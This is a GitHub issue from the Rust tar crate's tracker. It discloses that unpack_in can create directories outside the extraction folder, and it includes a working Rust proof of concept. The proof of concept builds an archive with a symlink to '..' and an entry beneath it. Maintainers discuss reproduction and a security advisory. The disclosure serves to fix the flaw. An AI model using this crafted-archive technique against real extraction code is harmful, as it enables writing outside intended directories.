Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

unpack_in allows creating directories outside the dst directory #238

Closed
mgjm opened this issue Sep 10, 2020 · 3 comments
Closed

unpack_in allows creating directories outside the dst directory #238

mgjm opened this issue Sep 10, 2020 · 3 comments

Comments

@mgjm
Copy link

mgjm commented Sep 10, 2020

The following code will create the folders exploit and exploit/foo outside of the demo folder:

use std::{fs::File, io, io::Result};
use tar::{Archive, Builder, EntryType, Header};

fn main() -> Result<()> {
    let mut buf = Vec::new();

    {
        let mut builder = Builder::new(&mut buf);

        // symlink: parent -> ..
        let mut header = Header::new_gnu();
        header.set_path("symlink")?;
        header.set_link_name("..")?;
        header.set_entry_type(EntryType::Symlink);
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        // file: symlink/exploit/foo/bar
        let mut header = Header::new_gnu();
        header.set_path("symlink/exploit/foo/bar")?;
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        builder.finish()?;
    };

    Archive::new(&*buf).unpack("demo")
}

Entry::unpack_in calls fs::create_dir_all (src/entry.rs:406) on the untrusted path and therefore can create directories outside of the dst directory.

Note: The provided code will fail with the expected error that symlink/exploit/foo/bar is outside of demo, but the parent directories are already created outside of the demo folder.

This is kind of related to #129, but still works in the current master.

@kpcyrd
Copy link

kpcyrd commented Jul 19, 2021

I'm having trouble reproducing this with tar v0.4.35:

Error: Custom { kind: Other, error: TarError { desc: "trying to unpack outside of destination path: /redacted/exploit/demo", io: Custom { kind: Other, error: "Invalid argument" } } }

Can this issue be closed?

Correction: The file isn't written but the folders are still created in the parent directory with the most recent version.

@tarcieri
Copy link

@alexcrichton we have a request to add a RUSTSEC advisory for this, FYI rustsec/advisory-db#965

@alexcrichton
Copy link
Owner

Thanks for the heads up!

This was referenced Aug 9, 2021
benesch pushed a commit to benesch/tar-rs that referenced this issue Aug 9, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

4 participants